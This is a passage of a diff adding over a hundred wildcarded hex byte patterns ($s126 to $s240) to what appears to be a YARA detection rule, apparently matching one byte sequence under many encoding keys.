+		$s126 = { 7E 7F 7E 7F 7E 7C ?? ?? 7E 7C 7E 7F 7E 7C ?? ?? 7E 7D 7E 7C 7E 7A ?? ?? ?? ?? 7E 7A 7E 7C 7E 7A ?? ?? ?? ?? 7E 7B 7E 7F 7E 7C ?? ?? }
+		$s127 = { 7F 7E 7F 7E 7F 7D ?? ?? 7F 7D 7F 7E 7F 7D ?? ?? 7F 7C 7F 7D 7F 7B ?? ?? ?? ?? 7F 7B 7F 7D 7F 7B ?? ?? ?? ?? 7F 7A 7F 7E 7F 7D ?? ?? }
+		$s128 = { 80 81 80 81 80 82 ?? ?? 80 82 80 81 80 82 ?? ?? 80 83 80 82 80 84 ?? ?? ?? ?? 80 84 80 82 80 84 ?? ?? ?? ?? 80 85 80 81 80 82 ?? ?? }
+		$s129 = { 81 80 81 80 81 83 ?? ?? 81 83 81 80 81 83 ?? ?? 81 82 81 83 81 85 ?? ?? ?? ?? 81 85 81 83 81 85 ?? ?? ?? ?? 81 84 81 80 81 83 ?? ?? }
+		$s130 = { 82 83 82 83 82 80 ?? ?? 82 80 82 83 82 80 ?? ?? 82 81 82 80 82 86 ?? ?? ?? ?? 82 86 82 80 82 86 ?? ?? ?? ?? 82 87 82 83 82 80 ?? ?? }
+		$s131 = { 83 82 83 82 83 81 ?? ?? 83 81 83 82 83 81 ?? ?? 83 80 83 81 83 87 ?? ?? ?? ?? 83 87 83 81 83 87 ?? ?? ?? ?? 83 86 83 82 83 81 ?? ?? }
+		$s132 = { 84 85 84 85 84 86 ?? ?? 84 86 84 85 84 86 ?? ?? 84 87 84 86 84 80 ?? ?? ?? ?? 84 80 84 86 84 80 ?? ?? ?? ?? 84 81 84 85 84 86 ?? ?? }
+		$s133 = { 85 84 85 84 85 87 ?? ?? 85 87 85 84 85 87 ?? ?? 85 86 85 87 85 81 ?? ?? ?? ?? 85 81 85 87 85 81 ?? ?? ?? ?? 85 80 85 84 85 87 ?? ?? }
+		$s134 = { 86 87 86 87 86 84 ?? ?? 86 84 86 87 86 84 ?? ?? 86 85 86 84 86 82 ?? ?? ?? ?? 86 82 86 84 86 82 ?? ?? ?? ?? 86 83 86 87 86 84 ?? ?? }
+		$s135 = { 87 86 87 86 87 85 ?? ?? 87 85 87 86 87 85 ?? ?? 87 84 87 85 87 83 ?? ?? ?? ?? 87 83 87 85 87 83 ?? ?? ?? ?? 87 82 87 86 87 85 ?? ?? }
+		$s136 = { 88 89 88 89 88 8A ?? ?? 88 8A 88 89 88 8A ?? ?? 88 8B 88 8A 88 8C ?? ?? ?? ?? 88 8C 88 8A 88 8C ?? ?? ?? ?? 88 8D 88 89 88 8A ?? ?? }
+		$s137 = { 89 88 89 88 89 8B ?? ?? 89 8B 89 88 89 8B ?? ?? 89 8A 89 8B 89 8D ?? ?? ?? ?? 89 8D 89 8B 89 8D ?? ?? ?? ?? 89 8C 89 88 89 8B ?? ?? }
+		$s138 = { 8A 8B 8A 8B 8A 88 ?? ?? 8A 88 8A 8B 8A 88 ?? ?? 8A 89 8A 88 8A 8E ?? ?? ?? ?? 8A 8E 8A 88 8A 8E ?? ?? ?? ?? 8A 8F 8A 8B 8A 88 ?? ?? }
+		$s139 = { 8B 8A 8B 8A 8B 89 ?? ?? 8B 89 8B 8A 8B 89 ?? ?? 8B 88 8B 89 8B 8F ?? ?? ?? ?? 8B 8F 8B 89 8B 8F ?? ?? ?? ?? 8B 8E 8B 8A 8B 89 ?? ?? }
+		$s140 = { 8C 8D 8C 8D 8C 8E ?? ?? 8C 8E 8C 8D 8C 8E ?? ?? 8C 8F 8C 8E 8C 88 ?? ?? ?? ?? 8C 88 8C 8E 8C 88 ?? ?? ?? ?? 8C 89 8C 8D 8C 8E ?? ?? }
+		$s141 = { 8D 8C 8D 8C 8D 8F ?? ?? 8D 8F 8D 8C 8D 8F ?? ?? 8D 8E 8D 8F 8D 89 ?? ?? ?? ?? 8D 89 8D 8F 8D 89 ?? ?? ?? ?? 8D 88 8D 8C 8D 8F ?? ?? }
+		$s142 = { 8E 8F 8E 8F 8E 8C ?? ?? 8E 8C 8E 8F 8E 8C ?? ?? 8E 8D 8E 8C 8E 8A ?? ?? ?? ?? 8E 8A 8E 8C 8E 8A ?? ?? ?? ?? 8E 8B 8E 8F 8E 8C ?? ?? }
+		$s143 = { 8F 8E 8F 8E 8F 8D ?? ?? 8F 8D 8F 8E 8F 8D ?? ?? 8F 8C 8F 8D 8F 8B ?? ?? ?? ?? 8F 8B 8F 8D 8F 8B ?? ?? ?? ?? 8F 8A 8F 8E 8F 8D ?? ?? }
+		$s144 = { 90 91 90 91 90 92 ?? ?? 90 92 90 91 90 92 ?? ?? 90 93 90 92 90 94 ?? ?? ?? ?? 90 94 90 92 90 94 ?? ?? ?? ?? 90 95 90 91 90 92 ?? ?? }
+		$s145 = { 91 90 91 90 91 93 ?? ?? 91 93 91 90 91 93 ?? ?? 91 92 91 93 91 95 ?? ?? ?? ?? 91 95 91 93 91 95 ?? ?? ?? ?? 91 94 91 90 91 93 ?? ?? }
+		$s146 = { 92 93 92 93 92 90 ?? ?? 92 90 92 93 92 90 ?? ?? 92 91 92 90 92 96 ?? ?? ?? ?? 92 96 92 90 92 96 ?? ?? ?? ?? 92 97 92 93 92 90 ?? ?? }
+		$s147 = { 93 92 93 92 93 91 ?? ?? 93 91 93 92 93 91 ?? ?? 93 90 93 91 93 97 ?? ?? ?? ?? 93 97 93 91 93 97 ?? ?? ?? ?? 93 96 93 92 93 91 ?? ?? }
+		$s148 = { 94 95 94 95 94 96 ?? ?? 94 96 94 95 94 96 ?? ?? 94 97 94 96 94 90 ?? ?? ?? ?? 94 90 94 96 94 90 ?? ?? ?? ?? 94 91 94 95 94 96 ?? ?? }
+		$s149 = { 95 94 95 94 95 97 ?? ?? 95 97 95 94 95 97 ?? ?? 95 96 95 97 95 91 ?? ?? ?? ?? 95 91 95 97 95 91 ?? ?? ?? ?? 95 90 95 94 95 97 ?? ?? }
+		$s150 = { 96 97 96 97 96 94 ?? ?? 96 94 96 97 96 94 ?? ?? 96 95 96 94 96 92 ?? ?? ?? ?? 96 92 96 94 96 92 ?? ?? ?? ?? 96 93 96 97 96 94 ?? ?? }
+		$s151 = { 97 96 97 96 97 95 ?? ?? 97 95 97 96 97 95 ?? ?? 97 94 97 95 97 93 ?? ?? ?? ?? 97 93 97 95 97 93 ?? ?? ?? ?? 97 92 97 96 97 95 ?? ?? }
+		$s152 = { 98 99 98 99 98 9A ?? ?? 98 9A 98 99 98 9A ?? ?? 98 9B 98 9A 98 9C ?? ?? ?? ?? 98 9C 98 9A 98 9C ?? ?? ?? ?? 98 9D 98 99 98 9A ?? ?? }
+		$s153 = { 99 98 99 98 99 9B ?? ?? 99 9B 99 98 99 9B ?? ?? 99 9A 99 9B 99 9D ?? ?? ?? ?? 99 9D 99 9B 99 9D ?? ?? ?? ?? 99 9C 99 98 99 9B ?? ?? }
+		$s154 = { 9A 9B 9A 9B 9A 98 ?? ?? 9A 98 9A 9B 9A 98 ?? ?? 9A 99 9A 98 9A 9E ?? ?? ?? ?? 9A 9E 9A 98 9A 9E ?? ?? ?? ?? 9A 9F 9A 9B 9A 98 ?? ?? }
+		$s155 = { 9B 9A 9B 9A 9B 99 ?? ?? 9B 99 9B 9A 9B 99 ?? ?? 9B 98 9B 99 9B 9F ?? ?? ?? ?? 9B 9F 9B 99 9B 9F ?? ?? ?? ?? 9B 9E 9B 9A 9B 99 ?? ?? }
+		$s156 = { 9C 9D 9C 9D 9C 9E ?? ?? 9C 9E 9C 9D 9C 9E ?? ?? 9C 9F 9C 9E 9C 98 ?? ?? ?? ?? 9C 98 9C 9E 9C 98 ?? ?? ?? ?? 9C 99 9C 9D 9C 9E ?? ?? }
+		$s157 = { 9D 9C 9D 9C 9D 9F ?? ?? 9D 9F 9D 9C 9D 9F ?? ?? 9D 9E 9D 9F 9D 99 ?? ?? ?? ?? 9D 99 9D 9F 9D 99 ?? ?? ?? ?? 9D 98 9D 9C 9D 9F ?? ?? }
+		$s158 = { 9E 9F 9E 9F 9E 9C ?? ?? 9E 9C 9E 9F 9E 9C ?? ?? 9E 9D 9E 9C 9E 9A ?? ?? ?? ?? 9E 9A 9E 9C 9E 9A ?? ?? ?? ?? 9E 9B 9E 9F 9E 9C ?? ?? }
+		$s159 = { 9F 9E 9F 9E 9F 9D ?? ?? 9F 9D 9F 9E 9F 9D ?? ?? 9F 9C 9F 9D 9F 9B ?? ?? ?? ?? 9F 9B 9F 9D 9F 9B ?? ?? ?? ?? 9F 9A 9F 9E 9F 9D ?? ?? }
+		$s160 = { A0 A1 A0 A1 A0 A2 ?? ?? A0 A2 A0 A1 A0 A2 ?? ?? A0 A3 A0 A2 A0 A4 ?? ?? ?? ?? A0 A4 A0 A2 A0 A4 ?? ?? ?? ?? A0 A5 A0 A1 A0 A2 ?? ?? }
+		$s161 = { A1 A0 A1 A0 A1 A3 ?? ?? A1 A3 A1 A0 A1 A3 ?? ?? A1 A2 A1 A3 A1 A5 ?? ?? ?? ?? A1 A5 A1 A3 A1 A5 ?? ?? ?? ?? A1 A4 A1 A0 A1 A3 ?? ?? }
+		$s162 = { A2 A3 A2 A3 A2 A0 ?? ?? A2 A0 A2 A3 A2 A0 ?? ?? A2 A1 A2 A0 A2 A6 ?? ?? ?? ?? A2 A6 A2 A0 A2 A6 ?? ?? ?? ?? A2 A7 A2 A3 A2 A0 ?? ?? }
+		$s163 = { A3 A2 A3 A2 A3 A1 ?? ?? A3 A1 A3 A2 A3 A1 ?? ?? A3 A0 A3 A1 A3 A7 ?? ?? ?? ?? A3 A7 A3 A1 A3 A7 ?? ?? ?? ?? A3 A6 A3 A2 A3 A1 ?? ?? }
+		$s164 = { A4 A5 A4 A5 A4 A6 ?? ?? A4 A6 A4 A5 A4 A6 ?? ?? A4 A7 A4 A6 A4 A0 ?? ?? ?? ?? A4 A0 A4 A6 A4 A0 ?? ?? ?? ?? A4 A1 A4 A5 A4 A6 ?? ?? }
+		$s165 = { A5 A4 A5 A4 A5 A7 ?? ?? A5 A7 A5 A4 A5 A7 ?? ?? A5 A6 A5 A7 A5 A1 ?? ?? ?? ?? A5 A1 A5 A7 A5 A1 ?? ?? ?? ?? A5 A0 A5 A4 A5 A7 ?? ?? }
+		$s166 = { A6 A7 A6 A7 A6 A4 ?? ?? A6 A4 A6 A7 A6 A4 ?? ?? A6 A5 A6 A4 A6 A2 ?? ?? ?? ?? A6 A2 A6 A4 A6 A2 ?? ?? ?? ?? A6 A3 A6 A7 A6 A4 ?? ?? }
+		$s167 = { A7 A6 A7 A6 A7 A5 ?? ?? A7 A5 A7 A6 A7 A5 ?? ?? A7 A4 A7 A5 A7 A3 ?? ?? ?? ?? A7 A3 A7 A5 A7 A3 ?? ?? ?? ?? A7 A2 A7 A6 A7 A5 ?? ?? }
+		$s168 = { A8 A9 A8 A9 A8 AA ?? ?? A8 AA A8 A9 A8 AA ?? ?? A8 AB A8 AA A8 AC ?? ?? ?? ?? A8 AC A8 AA A8 AC ?? ?? ?? ?? A8 AD A8 A9 A8 AA ?? ?? }
+		$s169 = { A9 A8 A9 A8 A9 AB ?? ?? A9 AB A9 A8 A9 AB ?? ?? A9 AA A9 AB A9 AD ?? ?? ?? ?? A9 AD A9 AB A9 AD ?? ?? ?? ?? A9 AC A9 A8 A9 AB ?? ?? }
+		$s170 = { AA AB AA AB AA A8 ?? ?? AA A8 AA AB AA A8 ?? ?? AA A9 AA A8 AA AE ?? ?? ?? ?? AA AE AA A8 AA AE ?? ?? ?? ?? AA AF AA AB AA A8 ?? ?? }
+		$s171 = { AB AA AB AA AB A9 ?? ?? AB A9 AB AA AB A9 ?? ?? AB A8 AB A9 AB AF ?? ?? ?? ?? AB AF AB A9 AB AF ?? ?? ?? ?? AB AE AB AA AB A9 ?? ?? }
+		$s172 = { AC AD AC AD AC AE ?? ?? AC AE AC AD AC AE ?? ?? AC AF AC AE AC A8 ?? ?? ?? ?? AC A8 AC AE AC A8 ?? ?? ?? ?? AC A9 AC AD AC AE ?? ?? }
+		$s173 = { AD AC AD AC AD AF ?? ?? AD AF AD AC AD AF ?? ?? AD AE AD AF AD A9 ?? ?? ?? ?? AD A9 AD AF AD A9 ?? ?? ?? ?? AD A8 AD AC AD AF ?? ?? }
+		$s174 = { AE AF AE AF AE AC ?? ?? AE AC AE AF AE AC ?? ?? AE AD AE AC AE AA ?? ?? ?? ?? AE AA AE AC AE AA ?? ?? ?? ?? AE AB AE AF AE AC ?? ?? }
+		$s175 = { AF AE AF AE AF AD ?? ?? AF AD AF AE AF AD ?? ?? AF AC AF AD AF AB ?? ?? ?? ?? AF AB AF AD AF AB ?? ?? ?? ?? AF AA AF AE AF AD ?? ?? }
+		$s176 = { B0 B1 B0 B1 B0 B2 ?? ?? B0 B2 B0 B1 B0 B2 ?? ?? B0 B3 B0 B2 B0 B4 ?? ?? ?? ?? B0 B4 B0 B2 B0 B4 ?? ?? ?? ?? B0 B5 B0 B1 B0 B2 ?? ?? }
+		$s177 = { B1 B0 B1 B0 B1 B3 ?? ?? B1 B3 B1 B0 B1 B3 ?? ?? B1 B2 B1 B3 B1 B5 ?? ?? ?? ?? B1 B5 B1 B3 B1 B5 ?? ?? ?? ?? B1 B4 B1 B0 B1 B3 ?? ?? }
+		$s178 = { B2 B3 B2 B3 B2 B0 ?? ?? B2 B0 B2 B3 B2 B0 ?? ?? B2 B1 B2 B0 B2 B6 ?? ?? ?? ?? B2 B6 B2 B0 B2 B6 ?? ?? ?? ?? B2 B7 B2 B3 B2 B0 ?? ?? }
+		$s179 = { B3 B2 B3 B2 B3 B1 ?? ?? B3 B1 B3 B2 B3 B1 ?? ?? B3 B0 B3 B1 B3 B7 ?? ?? ?? ?? B3 B7 B3 B1 B3 B7 ?? ?? ?? ?? B3 B6 B3 B2 B3 B1 ?? ?? }
+		$s180 = { B4 B5 B4 B5 B4 B6 ?? ?? B4 B6 B4 B5 B4 B6 ?? ?? B4 B7 B4 B6 B4 B0 ?? ?? ?? ?? B4 B0 B4 B6 B4 B0 ?? ?? ?? ?? B4 B1 B4 B5 B4 B6 ?? ?? }
+		$s181 = { B5 B4 B5 B4 B5 B7 ?? ?? B5 B7 B5 B4 B5 B7 ?? ?? B5 B6 B5 B7 B5 B1 ?? ?? ?? ?? B5 B1 B5 B7 B5 B1 ?? ?? ?? ?? B5 B0 B5 B4 B5 B7 ?? ?? }
+		$s182 = { B6 B7 B6 B7 B6 B4 ?? ?? B6 B4 B6 B7 B6 B4 ?? ?? B6 B5 B6 B4 B6 B2 ?? ?? ?? ?? B6 B2 B6 B4 B6 B2 ?? ?? ?? ?? B6 B3 B6 B7 B6 B4 ?? ?? }
+		$s183 = { B7 B6 B7 B6 B7 B5 ?? ?? B7 B5 B7 B6 B7 B5 ?? ?? B7 B4 B7 B5 B7 B3 ?? ?? ?? ?? B7 B3 B7 B5 B7 B3 ?? ?? ?? ?? B7 B2 B7 B6 B7 B5 ?? ?? }
+		$s184 = { B8 B9 B8 B9 B8 BA ?? ?? B8 BA B8 B9 B8 BA ?? ?? B8 BB B8 BA B8 BC ?? ?? ?? ?? B8 BC B8 BA B8 BC ?? ?? ?? ?? B8 BD B8 B9 B8 BA ?? ?? }
+		$s185 = { B9 B8 B9 B8 B9 BB ?? ?? B9 BB B9 B8 B9 BB ?? ?? B9 BA B9 BB B9 BD ?? ?? ?? ?? B9 BD B9 BB B9 BD ?? ?? ?? ?? B9 BC B9 B8 B9 BB ?? ?? }
+		$s186 = { BA BB BA BB BA B8 ?? ?? BA B8 BA BB BA B8 ?? ?? BA B9 BA B8 BA BE ?? ?? ?? ?? BA BE BA B8 BA BE ?? ?? ?? ?? BA BF BA BB BA B8 ?? ?? }
+		$s187 = { BB BA BB BA BB B9 ?? ?? BB B9 BB BA BB B9 ?? ?? BB B8 BB B9 BB BF ?? ?? ?? ?? BB BF BB B9 BB BF ?? ?? ?? ?? BB BE BB BA BB B9 ?? ?? }
+		$s188 = { BC BD BC BD BC BE ?? ?? BC BE BC BD BC BE ?? ?? BC BF BC BE BC B8 ?? ?? ?? ?? BC B8 BC BE BC B8 ?? ?? ?? ?? BC B9 BC BD BC BE ?? ?? }
+		$s189 = { BD BC BD BC BD BF ?? ?? BD BF BD BC BD BF ?? ?? BD BE BD BF BD B9 ?? ?? ?? ?? BD B9 BD BF BD B9 ?? ?? ?? ?? BD B8 BD BC BD BF ?? ?? }
+		$s190 = { BE BF BE BF BE BC ?? ?? BE BC BE BF BE BC ?? ?? BE BD BE BC BE BA ?? ?? ?? ?? BE BA BE BC BE BA ?? ?? ?? ?? BE BB BE BF BE BC ?? ?? }
+		$s191 = { BF BE BF BE BF BD ?? ?? BF BD BF BE BF BD ?? ?? BF BC BF BD BF BB ?? ?? ?? ?? BF BB BF BD BF BB ?? ?? ?? ?? BF BA BF BE BF BD ?? ?? }
+		$s192 = { C0 C1 C0 C1 C0 C2 ?? ?? C0 C2 C0 C1 C0 C2 ?? ?? C0 C3 C0 C2 C0 C4 ?? ?? ?? ?? C0 C4 C0 C2 C0 C4 ?? ?? ?? ?? C0 C5 C0 C1 C0 C2 ?? ?? }
+		$s193 = { C1 C0 C1 C0 C1 C3 ?? ?? C1 C3 C1 C0 C1 C3 ?? ?? C1 C2 C1 C3 C1 C5 ?? ?? ?? ?? C1 C5 C1 C3 C1 C5 ?? ?? ?? ?? C1 C4 C1 C0 C1 C3 ?? ?? }
+		$s194 = { C2 C3 C2 C3 C2 C0 ?? ?? C2 C0 C2 C3 C2 C0 ?? ?? C2 C1 C2 C0 C2 C6 ?? ?? ?? ?? C2 C6 C2 C0 C2 C6 ?? ?? ?? ?? C2 C7 C2 C3 C2 C0 ?? ?? }
+		$s195 = { C3 C2 C3 C2 C3 C1 ?? ?? C3 C1 C3 C2 C3 C1 ?? ?? C3 C0 C3 C1 C3 C7 ?? ?? ?? ?? C3 C7 C3 C1 C3 C7 ?? ?? ?? ?? C3 C6 C3 C2 C3 C1 ?? ?? }
+		$s196 = { C4 C5 C4 C5 C4 C6 ?? ?? C4 C6 C4 C5 C4 C6 ?? ?? C4 C7 C4 C6 C4 C0 ?? ?? ?? ?? C4 C0 C4 C6 C4 C0 ?? ?? ?? ?? C4 C1 C4 C5 C4 C6 ?? ?? }
+		$s197 = { C5 C4 C5 C4 C5 C7 ?? ?? C5 C7 C5 C4 C5 C7 ?? ?? C5 C6 C5 C7 C5 C1 ?? ?? ?? ?? C5 C1 C5 C7 C5 C1 ?? ?? ?? ?? C5 C0 C5 C4 C5 C7 ?? ?? }
+		$s198 = { C6 C7 C6 C7 C6 C4 ?? ?? C6 C4 C6 C7 C6 C4 ?? ?? C6 C5 C6 C4 C6 C2 ?? ?? ?? ?? C6 C2 C6 C4 C6 C2 ?? ?? ?? ?? C6 C3 C6 C7 C6 C4 ?? ?? }
+		$s199 = { C7 C6 C7 C6 C7 C5 ?? ?? C7 C5 C7 C6 C7 C5 ?? ?? C7 C4 C7 C5 C7 C3 ?? ?? ?? ?? C7 C3 C7 C5 C7 C3 ?? ?? ?? ?? C7 C2 C7 C6 C7 C5 ?? ?? }
+		$s200 = { C8 C9 C8 C9 C8 CA ?? ?? C8 CA C8 C9 C8 CA ?? ?? C8 CB C8 CA C8 CC ?? ?? ?? ?? C8 CC C8 CA C8 CC ?? ?? ?? ?? C8 CD C8 C9 C8 CA ?? ?? }
+		$s201 = { C9 C8 C9 C8 C9 CB ?? ?? C9 CB C9 C8 C9 CB ?? ?? C9 CA C9 CB C9 CD ?? ?? ?? ?? C9 CD C9 CB C9 CD ?? ?? ?? ?? C9 CC C9 C8 C9 CB ?? ?? }
+		$s202 = { CA CB CA CB CA C8 ?? ?? CA C8 CA CB CA C8 ?? ?? CA C9 CA C8 CA CE ?? ?? ?? ?? CA CE CA C8 CA CE ?? ?? ?? ?? CA CF CA CB CA C8 ?? ?? }
+		$s203 = { CB CA CB CA CB C9 ?? ?? CB C9 CB CA CB C9 ?? ?? CB C8 CB C9 CB CF ?? ?? ?? ?? CB CF CB C9 CB CF ?? ?? ?? ?? CB CE CB CA CB C9 ?? ?? }
+		$s204 = { CC CD CC CD CC CE ?? ?? CC CE CC CD CC CE ?? ?? CC CF CC CE CC C8 ?? ?? ?? ?? CC C8 CC CE CC C8 ?? ?? ?? ?? CC C9 CC CD CC CE ?? ?? }
+		$s205 = { CD CC CD CC CD CF ?? ?? CD CF CD CC CD CF ?? ?? CD CE CD CF CD C9 ?? ?? ?? ?? CD C9 CD CF CD C9 ?? ?? ?? ?? CD C8 CD CC CD CF ?? ?? }
+		$s206 = { CE CF CE CF CE CC ?? ?? CE CC CE CF CE CC ?? ?? CE CD CE CC CE CA ?? ?? ?? ?? CE CA CE CC CE CA ?? ?? ?? ?? CE CB CE CF CE CC ?? ?? }
+		$s207 = { CF CE CF CE CF CD ?? ?? CF CD CF CE CF CD ?? ?? CF CC CF CD CF CB ?? ?? ?? ?? CF CB CF CD CF CB ?? ?? ?? ?? CF CA CF CE CF CD ?? ?? }
+		$s208 = { D0 D1 D0 D1 D0 D2 ?? ?? D0 D2 D0 D1 D0 D2 ?? ?? D0 D3 D0 D2 D0 D4 ?? ?? ?? ?? D0 D4 D0 D2 D0 D4 ?? ?? ?? ?? D0 D5 D0 D1 D0 D2 ?? ?? }
+		$s209 = { D1 D0 D1 D0 D1 D3 ?? ?? D1 D3 D1 D0 D1 D3 ?? ?? D1 D2 D1 D3 D1 D5 ?? ?? ?? ?? D1 D5 D1 D3 D1 D5 ?? ?? ?? ?? D1 D4 D1 D0 D1 D3 ?? ?? }
+		$s210 = { D2 D3 D2 D3 D2 D0 ?? ?? D2 D0 D2 D3 D2 D0 ?? ?? D2 D1 D2 D0 D2 D6 ?? ?? ?? ?? D2 D6 D2 D0 D2 D6 ?? ?? ?? ?? D2 D7 D2 D3 D2 D0 ?? ?? }
+		$s211 = { D3 D2 D3 D2 D3 D1 ?? ?? D3 D1 D3 D2 D3 D1 ?? ?? D3 D0 D3 D1 D3 D7 ?? ?? ?? ?? D3 D7 D3 D1 D3 D7 ?? ?? ?? ?? D3 D6 D3 D2 D3 D1 ?? ?? }
+		$s212 = { D4 D5 D4 D5 D4 D6 ?? ?? D4 D6 D4 D5 D4 D6 ?? ?? D4 D7 D4 D6 D4 D0 ?? ?? ?? ?? D4 D0 D4 D6 D4 D0 ?? ?? ?? ?? D4 D1 D4 D5 D4 D6 ?? ?? }
+		$s213 = { D5 D4 D5 D4 D5 D7 ?? ?? D5 D7 D5 D4 D5 D7 ?? ?? D5 D6 D5 D7 D5 D1 ?? ?? ?? ?? D5 D1 D5 D7 D5 D1 ?? ?? ?? ?? D5 D0 D5 D4 D5 D7 ?? ?? }
+		$s214 = { D6 D7 D6 D7 D6 D4 ?? ?? D6 D4 D6 D7 D6 D4 ?? ?? D6 D5 D6 D4 D6 D2 ?? ?? ?? ?? D6 D2 D6 D4 D6 D2 ?? ?? ?? ?? D6 D3 D6 D7 D6 D4 ?? ?? }
+		$s215 = { D7 D6 D7 D6 D7 D5 ?? ?? D7 D5 D7 D6 D7 D5 ?? ?? D7 D4 D7 D5 D7 D3 ?? ?? ?? ?? D7 D3 D7 D5 D7 D3 ?? ?? ?? ?? D7 D2 D7 D6 D7 D5 ?? ?? }
+		$s216 = { D8 D9 D8 D9 D8 DA ?? ?? D8 DA D8 D9 D8 DA ?? ?? D8 DB D8 DA D8 DC ?? ?? ?? ?? D8 DC D8 DA D8 DC ?? ?? ?? ?? D8 DD D8 D9 D8 DA ?? ?? }
+		$s217 = { D9 D8 D9 D8 D9 DB ?? ?? D9 DB D9 D8 D9 DB ?? ?? D9 DA D9 DB D9 DD ?? ?? ?? ?? D9 DD D9 DB D9 DD ?? ?? ?? ?? D9 DC D9 D8 D9 DB ?? ?? }
+		$s218 = { DA DB DA DB DA D8 ?? ?? DA D8 DA DB DA D8 ?? ?? DA D9 DA D8 DA DE ?? ?? ?? ?? DA DE DA D8 DA DE ?? ?? ?? ?? DA DF DA DB DA D8 ?? ?? }
+		$s219 = { DB DA DB DA DB D9 ?? ?? DB D9 DB DA DB D9 ?? ?? DB D8 DB D9 DB DF ?? ?? ?? ?? DB DF DB D9 DB DF ?? ?? ?? ?? DB DE DB DA DB D9 ?? ?? }
+		$s220 = { DC DD DC DD DC DE ?? ?? DC DE DC DD DC DE ?? ?? DC DF DC DE DC D8 ?? ?? ?? ?? DC D8 DC DE DC D8 ?? ?? ?? ?? DC D9 DC DD DC DE ?? ?? }
+		$s221 = { DD DC DD DC DD DF ?? ?? DD DF DD DC DD DF ?? ?? DD DE DD DF DD D9 ?? ?? ?? ?? DD D9 DD DF DD D9 ?? ?? ?? ?? DD D8 DD DC DD DF ?? ?? }
+		$s222 = { DE DF DE DF DE DC ?? ?? DE DC DE DF DE DC ?? ?? DE DD DE DC DE DA ?? ?? ?? ?? DE DA DE DC DE DA ?? ?? ?? ?? DE DB DE DF DE DC ?? ?? }
+		$s223 = { DF DE DF DE DF DD ?? ?? DF DD DF DE DF DD ?? ?? DF DC DF DD DF DB ?? ?? ?? ?? DF DB DF DD DF DB ?? ?? ?? ?? DF DA DF DE DF DD ?? ?? }
+		$s224 = { E0 E1 E0 E1 E0 E2 ?? ?? E0 E2 E0 E1 E0 E2 ?? ?? E0 E3 E0 E2 E0 E4 ?? ?? ?? ?? E0 E4 E0 E2 E0 E4 ?? ?? ?? ?? E0 E5 E0 E1 E0 E2 ?? ?? }
+		$s225 = { E1 E0 E1 E0 E1 E3 ?? ?? E1 E3 E1 E0 E1 E3 ?? ?? E1 E2 E1 E3 E1 E5 ?? ?? ?? ?? E1 E5 E1 E3 E1 E5 ?? ?? ?? ?? E1 E4 E1 E0 E1 E3 ?? ?? }
+		$s226 = { E2 E3 E2 E3 E2 E0 ?? ?? E2 E0 E2 E3 E2 E0 ?? ?? E2 E1 E2 E0 E2 E6 ?? ?? ?? ?? E2 E6 E2 E0 E2 E6 ?? ?? ?? ?? E2 E7 E2 E3 E2 E0 ?? ?? }
+		$s227 = { E3 E2 E3 E2 E3 E1 ?? ?? E3 E1 E3 E2 E3 E1 ?? ?? E3 E0 E3 E1 E3 E7 ?? ?? ?? ?? E3 E7 E3 E1 E3 E7 ?? ?? ?? ?? E3 E6 E3 E2 E3 E1 ?? ?? }
+		$s228 = { E4 E5 E4 E5 E4 E6 ?? ?? E4 E6 E4 E5 E4 E6 ?? ?? E4 E7 E4 E6 E4 E0 ?? ?? ?? ?? E4 E0 E4 E6 E4 E0 ?? ?? ?? ?? E4 E1 E4 E5 E4 E6 ?? ?? }
+		$s229 = { E5 E4 E5 E4 E5 E7 ?? ?? E5 E7 E5 E4 E5 E7 ?? ?? E5 E6 E5 E7 E5 E1 ?? ?? ?? ?? E5 E1 E5 E7 E5 E1 ?? ?? ?? ?? E5 E0 E5 E4 E5 E7 ?? ?? }
+		$s230 = { E6 E7 E6 E7 E6 E4 ?? ?? E6 E4 E6 E7 E6 E4 ?? ?? E6 E5 E6 E4 E6 E2 ?? ?? ?? ?? E6 E2 E6 E4 E6 E2 ?? ?? ?? ?? E6 E3 E6 E7 E6 E4 ?? ?? }
+		$s231 = { E7 E6 E7 E6 E7 E5 ?? ?? E7 E5 E7 E6 E7 E5 ?? ?? E7 E4 E7 E5 E7 E3 ?? ?? ?? ?? E7 E3 E7 E5 E7 E3 ?? ?? ?? ?? E7 E2 E7 E6 E7 E5 ?? ?? }
+		$s232 = { E8 E9 E8 E9 E8 EA ?? ?? E8 EA E8 E9 E8 EA ?? ?? E8 EB E8 EA E8 EC ?? ?? ?? ?? E8 EC E8 EA E8 EC ?? ?? ?? ?? E8 ED E8 E9 E8 EA ?? ?? }
+		$s233 = { E9 E8 E9 E8 E9 EB ?? ?? E9 EB E9 E8 E9 EB ?? ?? E9 EA E9 EB E9 ED ?? ?? ?? ?? E9 ED E9 EB E9 ED ?? ?? ?? ?? E9 EC E9 E8 E9 EB ?? ?? }
+		$s234 = { EA EB EA EB EA E8 ?? ?? EA E8 EA EB EA E8 ?? ?? EA E9 EA E8 EA EE ?? ?? ?? ?? EA EE EA E8 EA EE ?? ?? ?? ?? EA EF EA EB EA E8 ?? ?? }
+		$s235 = { EB EA EB EA EB E9 ?? ?? EB E9 EB EA EB E9 ?? ?? EB E8 EB E9 EB EF ?? ?? ?? ?? EB EF EB E9 EB EF ?? ?? ?? ?? EB EE EB EA EB E9 ?? ?? }
+		$s236 = { EC ED EC ED EC EE ?? ?? EC EE EC ED EC EE ?? ?? EC EF EC EE EC E8 ?? ?? ?? ?? EC E8 EC EE EC E8 ?? ?? ?? ?? EC E9 EC ED EC EE ?? ?? }
+		$s237 = { ED EC ED EC ED EF ?? ?? ED EF ED EC ED EF ?? ?? ED EE ED EF ED E9 ?? ?? ?? ?? ED E9 ED EF ED E9 ?? ?? ?? ?? ED E8 ED EC ED EF ?? ?? }
+		$s238 = { EE EF EE EF EE EC ?? ?? EE EC EE EF EE EC ?? ?? EE ED EE EC EE EA ?? ?? ?? ?? EE EA EE EC EE EA ?? ?? ?? ?? EE EB EE EF EE EC ?? ?? }
+		$s239 = { EF EE EF EE EF ED ?? ?? EF ED EF EE EF ED ?? ?? EF EC EF ED EF EB ?? ?? ?? ?? EF EB EF ED EF EB ?? ?? ?? ?? EF EA EF EE EF ED ?? ?? }
+		$s240 = { F0 F1 F0 F1 F0 F2 ?? ?? F0 F2 F0 F1 F0 F2 ?? ?? F0 F3 F0 F2 F0 F4 ?? ?? ?? ?? F0 F4 F0 F2 F0 F4 ?? ?? ?? ?? F0 F5 F0 F1 F0 F2 ?? ?? }
